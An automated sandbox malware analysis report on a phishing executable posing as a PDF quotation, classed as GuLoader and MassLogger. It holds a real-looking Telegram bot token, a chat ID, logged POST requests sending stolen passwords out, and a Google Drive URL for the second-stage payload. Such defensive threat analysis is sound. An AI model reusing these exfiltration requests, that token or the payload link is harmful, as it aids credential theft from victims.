Windows Analysis Report
REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe

Overview

General Information

Sample name: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Analysis ID: 1575710
MD5: fd9335d7160883534e42839297a65c7d
SHA1: 80cd18a77f7896e06adc5bb4eb544e6c7e5bad5d
SHA256: 7fccb9545a51bb6d40e9c78bf9bc51dc2d2a78a27b81bf1c077eaf405cbba6e9
Tags: exe, GuLoader, user-threatcat_ch

Detection

GuLoader, MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
Source | Rule | Description | Author | Strings
00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000000.00000002.2521858617.000000000342E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616 | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
            No Sigma rule has matched
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-12-16T08:44:52.642100+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49837 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:44:56.153699+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49846 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:44:59.615943+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49857 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:04.530721+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49869 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:18.338618+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:21.677927+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49913 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:25.312878+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49924 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:28.684774+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49932 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:31.974564+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49943 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:36.359279+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:45:39.676339+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49963 | 149.154.167.220 | 443 | TCP
            2024-12-16T08:44:42.104474+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49812 | 158.101.44.242 | 80 | TCP
            2024-12-16T08:44:50.151400+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49812 | 158.101.44.242 | 80 | TCP
            2024-12-16T08:44:54.198292+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49844 | 158.101.44.242 | 80 | TCP
            2024-12-16T08:44:34.594664+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49790 | 172.217.19.174 | 443 | TCP

            AV Detection

            Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe.616.4.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Virustotal: Detection: 46%
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, ReversingLabs: Detection: 23%
            Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            Source: unknown, DNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 4_2_37CAD9E0 CryptUnprotectData,4_2_37CAD9E0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 4_2_37CAD9DF CryptUnprotectData,4_2_37CAD9DF
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknown, HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49817 version: TLS 1.0
            Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49790 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Code function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398

            Networking

            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49837 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49924 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49904 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49963 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49846 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49857 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49932 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49943 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49869 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d7b9c0b8eebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dadbdd2d442Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dd8a5601335Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e17dc155d45Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ebb7bf07885Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ee4c9083d38Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f0f291b1e8eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f3a96920953Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f6860597c58Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fa6c0cb5abeHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fe3675fc152Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49844 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49790 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d7b9c0b8eebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F67000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Nk
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295907191.0000000006520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rSOY
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rSyY
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/&xxs
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/S
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.000000000498C000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49790 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            Source: initial sample Static PE information: Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: String function: 00402BBF appears 51 times
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318721114.0000000034D77000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
